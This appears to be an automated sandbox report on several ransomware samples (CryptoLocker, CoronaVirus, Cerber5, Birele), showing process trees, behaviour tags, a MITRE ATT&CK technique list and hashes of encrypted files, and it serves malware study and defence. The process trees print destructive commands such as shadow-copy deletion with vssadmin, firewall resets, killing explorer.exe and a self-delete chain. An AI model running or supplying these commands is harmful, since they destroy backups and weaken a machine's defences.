C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe"1⤵
- Executes dropped EXE
PID:5576 -
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" "/rC:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\CryptoLocker.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1496 -
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w000002483⤵
- Executes dropped EXE
PID:4408
-
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\CoronaVirus.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\CoronaVirus.exe"1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
PID:4528 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵PID:5308
-
C:\Windows\system32\mode.commode con cp select=12513⤵PID:13976
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:16196
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵PID:15304
-
C:\Windows\system32\mode.commode con cp select=12513⤵PID:15728
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:14640
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"2⤵PID:15500
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"2⤵PID:15508
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Cerber5.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Cerber5.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Modifies registry class
PID:6104 -
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall set allprofiles state on2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5612
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall reset2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5980
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WG3DYH_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵PID:7748
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___HMRRA_.txt2⤵
- Opens file in notepad (likely ransom note)
PID:7688
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "C" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:12040 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "C"3⤵
- Kills process with taskkill
PID:12712
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 127.0.0.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12600
-
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Birele.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Ransomware\Birele.exe"1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Adds Run key to start application
PID:6044 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM explorer.exe2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5044 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6140
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1924 -ip 19241⤵PID:14012
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵
- Executes dropped EXE
PID:14032
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:13900
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵
- Executes dropped EXE
PID:19448
-
C:\Programdata\RealtekHD\taskhostw.exe"C:\Programdata\RealtekHD\taskhostw.exe"1⤵
- Executes dropped EXE
PID:3836
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Windows Management Instrumentation
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
4Registry Run Keys / Startup Folder
2Winlogon Helper DLL
2Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Account Manipulation
1Boot or Logon Autostart Execution
4Registry Run Keys / Startup Folder
2Winlogon Helper DLL
2Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1File and Directory Permissions Modification
1Hide Artifacts
4Hidden Files and Directories
3Hidden Users
1Impair Defenses
6Disable or Modify System Firewall
1Disable or Modify Tools
3Safe Mode Boot
1Indicator Removal
2File Deletion
2Modify Registry
12Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Network Service Discovery
1Password Policy Discovery
1Peripheral Device Discovery
1Permission Groups Discovery
1Local Groups
1Query Registry
5Remote System Discovery
1System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudtl.dat.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize16B
MD5ab6de875d3799888d31a9d4cb9f3ab87
SHA1016efa66d10392bda0c9e33ff9b2510b05859062
SHA2562b736c9762d3c7e4f0de4512d26b537db66a442a3ae6c0b2b2198ed64f491837
SHA5129cddcc9cf2bad4a27b92e067db81d6967fa12fd3e6ed2fe562a11baa20468d7f6dafd8ac37139ae5861f3303a368d95a998356a0a120d4612d9401299fcbe3de
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize720B
MD5eda795733f4550de1afe1f3411127b75
SHA12202812e597349752149335c50eda4aae8f976b6
SHA25623227e63f157f20452f68902d5db85f10551fbc9daf78b95a7d97862f9f90295
SHA5128dae88527eb0582549b0d5e7897d07717754485473316257427d584b62f6020bd41c8cb825973fb7aab4c72b35ae7dbd751bac2f1d45d4c9ce07f3d33652f5c0
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize688B
MD54b4f99c1e39170e7359a2fb9c6cb011a
SHA1a08c447891fbd2b21b56f4317dd52d5a41ac8f99
SHA2561cd4549fa000afbbd72aa63d84446bc2c7a673bd336bfd5beded1e085301b4b9
SHA51255dbedcafe4701a914e12b2168bc65ca11897c583c65553b7cc9ba9b0242ba2127103296c56cf3f157ede7e8b3021a13f30c4d98910fc96e7c174a3c88978a6f
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize1KB
MD57d0c89017fae6a418038c0f9949697e3
SHA1198549b3cadc7cd72cf241caf985da79b9a6d021
SHA2563f7d0d81bfc2f3993cc43e292f9db11c4cf0d30e4ba8800b4f8ac2624c7d00a5
SHA5126c88a9cd2d02628624f103f7cbbc3c69ae358cb1bc51e0d00b63103cbc1cab6151e441603721ec3b6313476e06a4fae86b65f74cbe4884c240a547811c2d7cd3
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize448B
MD5fd90bcaa936be2af1c927738fd8776eb
SHA1c6c819e7b0d52f64a163fa138657bc3faa8075f6
SHA256729d455a7850a4db43d0b7567acdbcd0ff0c8b77e868449a121bac974108a1a2
SHA51227cb593fea5f4594568e0d257d98d298ac69da5134b8e1ce75e0adf5a345edcccef0993ee396e3cb9d8d89981988946dd37f9656c6280eb9dee56e770c18561c
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize624B
MD584bafe2970f8cd354b0ec6a0c5b20dea
SHA172b763cf402b50950c4f982dd2c2f1c6452f7bbe
SHA256b6735d2240cf114973cdc3a8564be3d7398de9fdeb63737e3901639a08650e27
SHA512853acf7db7eb5b79d7f61968abe725a49a6378be1cfed1b2b8a6ab712c193844454c803decdcd9e7e75a243b6cf8bbc6eafb04e933c1422603bfafec8fe470a9
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize400B
MD517fad3970c2c06e68da23e665c84e90a
SHA18a8d8fb87a3eb02190a4c111736cbe8ade3a9f50
SHA256dc46a2a94f5af135384782c7d6b3a822ecb66293d630def5d5060981c63c58df
SHA51294af17b8fa6a661eb2c24f953fbfcfdf2f7428394e12f1527b7211c3184877fd721a7ef27ec9efa8c8e0cdaf3bd31bf067a33cd6f55fdf60d8f236f8bd022cfd
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize560B
MD53a214eda11fd41c323bf7100696324ea
SHA1991b3d025fc2d87a5fee1d4d1cf290b9a0770644
SHA2567c6e1236a95a23c9c85aaddefeb2bcf6a24c3fa0ff1e185f9dcf8083d72f7c77
SHA51290fcd08ac64258c00666afaa1927e7eee51b2e8543594cded8376eadeb9f4bac894ea31bd226a7a4ba91bf6834d003a14e39627d0823fdfd9c277aeef2cee784
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize400B
MD5736b989dd1f5d1ab72a259076145a116
SHA19dc4c2aa18e18e29f1810bd2e2e4f168e1094106
SHA256e3426602ef8a24057ef1ec24fe25a9d5e4de94769e1a5313f3fc07ac1776012f
SHA5124a3542101fe904b65006c2eb5e0c2d840934a5f3664e121681a0cdadd5e86001ee546fddf57e154815e1bffdb2b0735c529d1b55110c8da6bad71a5b6dff6e8b
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize560B
MD535e024aa3c535c0de1f242441cd8f464
SHA1d879ba572c00323ea733043f2789c413eeab8a07
SHA25667a4c8db9a613b873410ab95d41057217feb8034cbb1ff8b72ea279375b31c61
SHA512ec6de6cddb27626b66be059cd6dbcbcde8f1013266e4864e36fe9ff8502316a93d302132714492833ce8135165620ef916ac859c0f7bb5cf58f797d0a3c1146c
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize400B
MD5d55fa575379abecc7da4ad49501210c7
SHA110207daa5c06edd97f05f8bf00d1b786a205e74c
SHA256a93da7bcb318f7b826c4c4de820d364d61e673a8fc81dbff1500ad491a43ecc9
SHA512130c463428c1ce2813d8133d9ae03db660fec0a37e6f091ea03df29c4c375b684f7beae8a2f3c250a9abaa21c01b44a80510d6b7846f88eb613d47d4c534a6d2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize560B
MD59eb5bb7c79ddb6453d9445e2ec8ad768
SHA1c8593e45c68462e44f8e6c229747214feef05f17
SHA2563c5bcf93e579e0b8622752adcc8c3e80727f0ad281253f189ccfacd84005f507
SHA512dfaf943729f930e81171b9651e42e167f382006061ad187cffbd636539c33a31581742c8d257cb0105cd1b320ccff52473a62117ec556014ee9dd9a49b726719
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize7KB
MD50f8b6aa96e0bd5dfff106456243f127c
SHA14c0383b9714fdbfc9defeab80009f4ef555414d7
SHA2568957a5172b26ce8e5020698590d492cc1f1973b63006d6e8d404aa5f547647cd
SHA512b352009d8a9708d88f8f6e37f2ae9b7d25a9f5666d46d621cacd86fa76571825b291338c3d231b928edc385b6ad56d467a66ef9cd83736ff730119bcd4b3c715
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize7KB
MD52834376ddd16e0d4c923368db7742f23
SHA1b3460f29f12cef9527079ca520d573b5c4e46155
SHA2563a2c69c0c57c7fc1e527bb6a7cdbf2739ab080511581bce64db3b39da92fd363
SHA5124d22d8ce451bf59eeaafb00d70a84548a1ab902ef16662d2636f3988ca00cf5049155b9b9a95fbf19609b36165537b70c725b6b663d088a8d0634fb76681cf8b
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_retina.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize15KB
MD5d924d004cd71a42aaf7ed874528b2174
SHA1cea36e147a3db2d4fb027a0fdb952f051776e482
SHA25679e9198bfb13a5ed9651568885ba7e382ccf52821a0f0e7e94815be305f73add
SHA512402b7d854bee435837c840812ebe45dc399b1510b8dee2ffb3e8ed0c466b17679ed573a0d410b9d4edb6b546685ff7c8b8fbd47a7f78fa007bd3f9b54d25274d
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize8KB
MD5563176d01bd1d0e202fbc3de7d169b5c
SHA1b2a6c91d788bc6198e370d9af88d0ce8b3a99c7e
SHA2569117f85bac305208c3fa3ed489752751012f01fb6f910e40f978f80a46665c0c
SHA512d0856bbed1b2a174965bcee6cb14f5bbba3f042f3d21cfe829b206eb51dba9fcdd994f80780077b4ad4707399d5306a86c5d6d0c7696afff66eab89b56ef8ab2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize17KB
MD5d2fc87311b08980d6ffb7dcef2fa3414
SHA1e8645cba32651e4bc4c734ed249e6da7c4ca5ddc
SHA25637cdcec6edab7b62c802c7e391959e7ba4c88ec0060170ac51e9579e43917a29
SHA512ff12aafad506c8931446cc970a7d32383cfe071f269a8e96184d0effdaff70572db452c490892b940b627f71ac9c7277a7572feabaf0347e4d527a2659f038a6
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize192B
MD59708d4729e60fa047d0b131e5e331e8e
SHA1dd2f0b1f33eeb0ae634638ae1f347f2de257dd13
SHA25606252aaf1a1968be597a4ffdfd136ac43757f049893af4851c401916a84186a6
SHA512dfbd9921b860322ec5d896c4a7ff59c23ce695b464ff2be17a252051c4f97d9107f76af0d03c9d06e3fe4a2cb37b54c4ea660d5e997638caba17c44f379c3e89
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize704B
MD56a53c8df41f50f627aad253cd8e289e1
SHA1992d8629cbd3a6e69aa3f9d7bee4b7841499eeb7
SHA2565802290a9a546f6276c99d26964e6443063b7b9626981ac85111db370f3f4a35
SHA512146e28a464cbb0e0a78627019d1568f395bb62e7096179e2185cd1d2261b45cb8635e3c7ca7328ecced2bf4d714257a9c9340fa77f956e6239bd6b9e6b827677
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize8KB
MD548c0f982af1a64949b8ab773e8de2343
SHA16369e490b4a60c91e13256dc91f5358fa9c377a6
SHA256236f81226ce786bc75a863ade6449ba04857c81fd29745154c04c85d749b181e
SHA512e312965ccb9a421daf7c971c9391f46c6dbe7fe1659a963f3e2b5ea27c99e0dc6c1e67a38e321e9b749ce849bb36f098be3ca3989488dde280d07d565896e5ca
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize19KB
MD54ad05b945c72cd8c34188ac5b4c7a871
SHA1e4fa113df4ade0618dd2dc4d9cfd097c6d13c152
SHA25674e69925946a77a45da51f9aaeffbe084461430ae0f96b71bf3a79d9cf51a6d4
SHA512cdafe911bb7e6fe7484a394ff3c5da504a4d85412f806c1356313482687843c3e52a557307c168f1b76af0c38db2f6e28665a11fc201223b15057055d29037ed
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize832B
MD5315ec127078ad99d6d6acd782af957d4
SHA19305d60563e5247db594166d0f6422bf08d81691
SHA2568e3d68965426dfd111574b058ca7f37acab02ab378525055388e9cc44ae46d7f
SHA51234010cbc07f50d87a029f5395506819fd8391ebd5087ce217e4d3c7f0d645c176a0f3cc6d6d32514162972954283fe02308e7993e11355dd05de5c36a46a3c8c
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize1KB
MD559979d0b99bc98f8b05d749440512b19
SHA16596ba33b516b4f7a062173392a1d279af3a733f
SHA256b332c77e75ea526bb3287db986192a8969c056b9e9d361e51f57e2b2640986e1
SHA51260b5e4c3b839980dee16486f3d8071a22eed094a3d5b2e3d76fc62f2404e2ae11020092dcbe54af4426a31f392c787e201632e09e733fd87bdd9ddb44d4a4036
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize1KB
MD5c3f1611e16f8b6ccf6164f4b0eab8f87
SHA1b00ba04b80ec23b0001e35e8fcb6e591603ef81b
SHA256237c62976ebadb0d03f31c7ed33b750a21b22d3dda139abf2165528f8be1c6fa
SHA5120eafb91c2f77b17df27dd6719fc643c6558a0c5a63d73f2a0e43b469059714ecc9cbb598ffe147103cf397bd2a20b7b1bc2caf1556cd8f9fb6d9b00f5c7a288f
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize816B
MD5004c4020fdba74c6bc7512a6cfcb052d
SHA1d80d4d5585e31112b6ebc38cace31dfff1f6c559
SHA2565e565889c549429a69fb5927e7ac8aad1f8384ecf87a40374638bb32c1adcd70
SHA512c7e7bd5e6b9fe1e864de365882dab6f1979bd49f461b6514fb9203aa1a821f7078b9a3143a51903a8b5c17538ed5bf38e649512d86b6951d5de74eb0df163337
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize2KB
MD598627142de0c3d57f42011a3a2c10034
SHA1107de5b518db00f0b6e4fa46adb549224c1ecce3
SHA25665b30ba92c4381da00e2b40092e9401998178d00a8871d104ee9e227ea4a7a66
SHA512ac370277e164f4c475b04ac75c0aeaf9849d3d5c9507f4e902468dc0fd1451cdb07f9241ad9b3b4355a90f346b7c6b6deca77e7220955841c19ea94934c0d6dd
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize2KB
MD558f39ac1219b69bfac1450093e8300c5
SHA141c63e82c9497c475bbd1d0c71dda8e929712cf1
SHA256284529378c5017046468b988d58a7447ddbf1813dc12781c4a16b29ba6bf50b4
SHA512007616c4a44f71d169c8fffa3a5fbba821348b28e8bac522cc296987ce69507ccbd6412a5772c0e222d045973b2eb8e2e4a6c82b54a33c85b50646753df65679
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize4KB
MD576799309900820c170e0f181c88f072e
SHA1fb51dc4785886d4ae10b928670d87b466bf616c8
SHA2560726b8dbc82da534d1f9810cdf2bbf934f7d7891d0ed32ba39e8d8de742f6cd8
SHA512a3ef6420ad9bb5c68337a345262b01c893ede580fdad9a4bd25ceb5a7a6a844739bc4e9b4e11c904958c3ad8db4182e50289a0289b848fd0e94e42ff69e771ac
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize304B
MD564cd38d78ce0bfb25cf09737f30ab8a0
SHA186c5d7bd25242847c90b4d5f2b896d7e399ad098
SHA256753dce6e1d3b091cc93f890fd42ae851da49ec965c1eba78cc76a09108e695d8
SHA51289658d95c9b228033c42eb937708d202d63202ed8da4850582c68eea305aeb7e0cd3946a0df34393a0f0d435e5f12c377690e2cd7b31a10bcbf0a08fd7ad4fc8
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize400B
MD5f762cb3efe8846add051259a52c9277b
SHA111a5026375e66b0029d6651364cbb9dfc0227b32
SHA2560d38033a27b2dd0e6329872500325a5c40d64dc8765d33440c4f118cd4b32d8d
SHA5129a4078691ff8e840e945e57cbf97cfac0e22bf5a5f487b8b22d20ca77c2d845827373ae36229e0a7fcbbce959f616fa2342b94efcdd950e1ef01a6b67296696c
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize1008B
MD56ba0c72b78dd039f40f20238d0f42a0e
SHA16f1770804b13071ad8bc079e31a41d873b0627b2
SHA256395e7e06a6329c9b7f09b5d4dada5297be705cb5e54bb8112ca48ff1cec31803
SHA512fbaa7c3f0819c9418a30f8ff833aa7c5f2eb6f7b57c051d0f73586a558d74979cfb215c07d29ab148cf020a7caa16812fce5ad6d37b441461d6180427189a50e
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize1KB
MD50b3065c33a5847ef56380852bb7ed109
SHA12a224a0d4218de28c05db8be6ed587b587e0ddd5
SHA25639328a7abb158183f0aa7fbe37628f5894287faa5b5df5b49d1cccef6edfb980
SHA51282066a70362c425d886ac5d17531363275ed779ee9ee408ccaad3c78362d44d6fd485daa25184186e7673fef4c488e9dccb7c0cc3c14af598f261ee792fdead6
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize2KB
MD5ab02f7fefa61ce68e840be25a5a77780
SHA1c51c2b034c5b7a3c032bef87fdeda09db842519e
SHA256dc3b68a2e3d3e002373f217e1e9ae1119ac909a0d5a1d0827e868f1edd64ed9c
SHA512fc24c1491fbc954838ee42d12bc9cbbf18650afaa5bba35fe631e4c03bad744d740939f80b729280bb8c6d8a055463b2bd4c1434a7a5c465df8619c4b7eb3b1b
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize848B
MD5dac6cc536fc80bbd4588ae9b4ac97e56
SHA118eec45fba924b268ae06268c823263a22642e84
SHA2560ca5d9c4063860db5dffaa66bf08d4ac1d46b80dfd1040ad39748d1d9ea4013d
SHA51219d86db3c77457f3fa154cafc9fee30a7769b6a4f2e7c042c1248882ad12c5e3a170c3c8ef06be0c0f3c1f2224155c22bd976baf9f88eb5af2907c32868e06c7
-
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize32KB
MD53c8dbba67f4570f6fae7780ae8729932
SHA1492a31ac91ded34e13061be1b21c89a25e4a411a
SHA25676f5246bf7b8cda2386d2e38b3b5502d966788c1545665112885389f1afa96ef
SHA5125cb664f43f5a65d92033bf9e16a175200c25a0a02bf015fe7195029bcdeb2b39e7a26b9d19fbf063b00b399914a855886ea26a9eecad3a704905607f7bc7edbf
-
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\EBWebView\x86\DECRYPT_YOUR_FILES.HTML.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize1KB
MD5e1c9f32116da36c67dca16e853a80d74
SHA18731ca41b36bc0dd6908a7e8f17d9e6aadfadcea
SHA25675300d45414811f6bfe4a4e7bb31042645fae13379efb0146b776d64d55920bf
SHA51241dc05a9d5abc8bf7fe17bdcc12676c8975b80b6e4ab425177b507cf82190d18768541c008a161ae1f38e54a4a74472a422f27e4a315561756ea01172c1ac31a
-
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\ffmpeg.dll.id-BF300B0A.[[email protected]].ncov.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E
Filesize4.5MB
MD5580e91957eb9d5fd1b2bac300cf77c15
SHA1ae15c6dd59944ce71dbef22bead0fc4f438e3db3
